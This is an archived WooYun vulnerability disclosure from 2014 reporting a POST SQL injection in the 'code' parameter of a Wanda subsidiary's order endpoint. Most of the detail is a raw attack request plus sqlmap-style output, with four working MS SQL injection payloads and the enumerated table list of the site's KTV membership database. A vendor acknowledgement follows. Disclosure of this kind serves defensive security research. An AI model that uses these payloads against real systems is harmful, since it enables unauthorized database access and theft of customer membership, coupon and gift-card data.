当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059679

漏洞标题:万达某分站POST注射

相关厂商:大连万达集团股份有限公司

漏洞作者: Focusstart

提交时间:2014-05-07 14:12

修复时间:2014-06-21 14:13

公开时间:2014-06-21 14:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-07: 细节已通知厂商并且等待厂商处理中
2014-05-07: 厂商已经确认,细节仅向厂商公开
2014-05-17: 细节向核心白帽子及相关领域专家公开
2014-05-27: 细节向普通白帽子公开
2014-06-06: 细节向实习白帽子公开
2014-06-21: 细节向公众公开

简要描述:

万达某分站POST注射

详细说明:

地址:www.dagexing.com
POST /order/checkGroupBuyCode.action HTTP/1.1
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=E5ABCE2EE25E063B1FDF0753DBB8F24A.jvm1
Host: www.dagexing.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
code='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(121)%2bCHAR(75)%2bCHAR(73)%2bCHAR(107)%2bCHAR(50)%2bCHAR(102)%2bCHAR(49)%2bCHAR(101))%20FROM%20syscolumns)%2b'
Place: POST
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(75)+CHAR(73)+CHAR(107)+CHAR(50)+CHAR(102)+CHAR(49)+CHAR(101)) FROM syscolumns)+'' AND 9020=9020 AND 'ucso'='ucso
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: code=-4383' OR 2409=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(121)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (2409=2409) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(110)+CHAR(106)+CHAR(113))) AND 'AbGg'='AbGg
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: code=-3140' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(121)+CHAR(119)+CHAR(113)+CHAR(107)+CHAR(89)+CHAR(117)+CHAR(101)+CHAR(68)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(110)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: code=-3547' OR 1350=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'wccJ'='wccJ
---
web application technology: Apache
back-end DBMS: Microsoft SQL Server 2008
Database: KTV_MMS
[132 tables]
+------------------------------------------+
| cdc.captured_columns |
| cdc.change_tables |
| cdc.dbo_MMS_ACCESS_SRC_CT |
| cdc.dbo_MMS_BLACK_LIST_CT |
| cdc.dbo_MMS_CARD_CT |
| cdc.dbo_MMS_CARD_TYPE_CT |
| cdc.dbo_MMS_COUPON_BATCH_CT |
| cdc.dbo_MMS_COUPON_CATEGORY_CT |
| cdc.dbo_MMS_COUPON_DISTRIBUTION_BATCH_CT |
| cdc.dbo_MMS_COUPON_SUBTYPE_CT |
| cdc.dbo_MMS_COUPON_TYPE_CT |
| cdc.dbo_MMS_CUSTOMER_TYPE_CT |
| cdc.dbo_MMS_DEGRADE_RULE_CT |
| cdc.dbo_MMS_EXCHANGE_RULE_CT |
| cdc.dbo_MMS_LOAD_BATCH_CT |
| cdc.dbo_MMS_MEMBER_CLASS_CT |
| cdc.dbo_MMS_MEMBER_COMPANY_CLASS_CT |
| cdc.dbo_MMS_MEMBER_EXT_CT |
| cdc.dbo_MMS_MEMBER_LOCKING_CT |
| cdc.dbo_MMS_MEMBER_PROMOTION_CT |
| cdc.dbo_MMS_MEMBER_TYPE_CT |
| cdc.dbo_MMS_MEMBER_WECHAT_CT |
| cdc.dbo_MMS_POINT_RULE_CT |
| cdc.dbo_MMS_POINT_SRC_CT |
| cdc.dbo_MMS_PROMOTION_ITEM_CT |
| cdc.dbo_MMS_STORE_REWARD_CHOICE_CT |
| cdc.dbo_MMS_STORE_REWARD_CT |
| cdc.dbo_MMS_STORE_REWARD_JOURNAL_CT |
| cdc.dbo_MMS_UPGRADE_RULE_CT |
| cdc.ddl_history |
| cdc.index_columns |
| cdc.lsn_time_mapping |
| MMS_ACCESS_SRC |
| MMS_BIRTHDAY_PROGRAM_ITEM |
| MMS_BIRTHDAY_PROGRAM_ITEM |
| MMS_BLACK_LIST |
| MMS_CARD_INVENTORY |
| MMS_CARD_INVENTORY |
| MMS_CARD_PURCAT |
| MMS_CARD_SALE |
| MMS_CARD_SERIAL |
| MMS_CARD_TEMP |
| MMS_CARD_TYPE |
| MMS_CASH_COUPON_EXT |
| MMS_CLASS_PROGRAM |
| MMS_CONTROL |
| MMS_COUPON_BATCH |
| MMS_COUPON_BATCH |
| MMS_COUPON_CATEGORY |
| MMS_COUPON_DISTRIBUTION_BATCH |
| MMS_COUPON_EXT |
| MMS_COUPON_HIST |
| MMS_COUPON_INVENTORY |
| MMS_COUPON_JOURNAL |
| MMS_COUPON_PROMOTION |
| MMS_COUPON_SERIAL |
| MMS_COUPON_SUBTYPE |
| MMS_COUPON_TYPE |
| MMS_CUSTOMER_TYPE |
| MMS_DAILY_COME |
| MMS_DEGRADE_CANDIDATE |
| MMS_DEGRADE_RULE |
| MMS_DEGRADE_SUBSIDIARY |
| MMS_EXCHANGE_RULE |
| MMS_GIFTCARD_BATCH_SELL |
| MMS_GIFTCARD_BATCH_SELL |
| MMS_GIFTCARD_CARD_TRAIL |
| MMS_GIFTCARD_DATE_STAT |
| MMS_GIFTCARD_JOURNAL |
| MMS_GIFTCARD_STATE_TRAIL |
| MMS_GIFTCARD_STATE_TRAIL |
| MMS_GIFTCARD_STATUS_TRAIL |
| MMS_GIFTCARD_STORE_RULE |
| MMS_GRADE_TRAIL |
| MMS_INCR_MEMBER |
| MMS_LEGACY_GIFTCARD |
| MMS_LEGACY_MEMBER_BILL |
| MMS_LEGACY_MEMBER_BILL |
| MMS_LOAD_BATCH |
| MMS_MARKETING_COUPON |
| MMS_MARKETING_ITEM |
| MMS_MARKETING_NOTIFY |
| MMS_MEMBER_ACCOUNT |
| MMS_MEMBER_ACCOUNT |
| MMS_MEMBER_APP |
| MMS_MEMBER_BILL_DETAIL |
| MMS_MEMBER_BILL_DETAIL |
| MMS_MEMBER_CABINET_CHOICE |
| MMS_MEMBER_CABINET_CHOICE |
| MMS_MEMBER_CABINET_COMMIT |
| MMS_MEMBER_CABINET_HIST |
| MMS_MEMBER_CARD_TRAIL |
| MMS_MEMBER_CARE |
| MMS_MEMBER_CAT2 |
| MMS_MEMBER_CAT2 |
| MMS_MEMBER_CAT3 |
| MMS_MEMBER_CLASS |
| MMS_MEMBER_COMPANY_CLASS |
| MMS_MEMBER_EXT |
| MMS_MEMBER_LOCKING |
| MMS_MEMBER_MARKETING |
| MMS_MEMBER_MISC |
| MMS_MEMBER_PROMOTION |
| MMS_MEMBER_RATING |
| MMS_MEMBER_REWARD_COMMIT |
| MMS_MEMBER_STATE_TRAIL |
| MMS_MEMBER_STATE_TRAIL |
| MMS_MEMBER_TYPE |
| MMS_MEMBER_WECHAT |
| MMS_POINT_EXCHANGE |
| MMS_POINT_JOURNAL |
| MMS_POINT_RULE |
| MMS_POINT_SRC |
| MMS_POINT_TRAIL |
| MMS_PROMOTION_ITEM |
| MMS_PUR_BATCH_LINE |
| MMS_PUR_BATCH_LINE |
| MMS_STORE_JOURNAL |
| MMS_STORE_REWARD_CHOICE |
| MMS_STORE_REWARD_CHOICE |
| MMS_STORE_REWARD_JOURNAL |
| MMS_SYSTEM_PROFILE |
| MMS_UPGRADE_RULE |
| MMS_VERSION |
| MMS_WECHAT_PINCODE |
| VSYS_ALL_ITEM |
| VSYS_COMPANY |
| VSYS_ITEM_OPER |
| VSYS_ITEM_OPER |
| VSYS_USER |
| systranschemas |
| vip |
+------------------------------------------+

漏洞证明:

见上

修复方案:

Null

版权声明:转载请注明来源 Focusstart@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-07 22:59

厂商回复:

感谢Focusstart同学的关注与贡献。此漏洞目测存在。马上反馈至后台整改。谢谢!

最新状态:

暂无


漏洞评价:

评论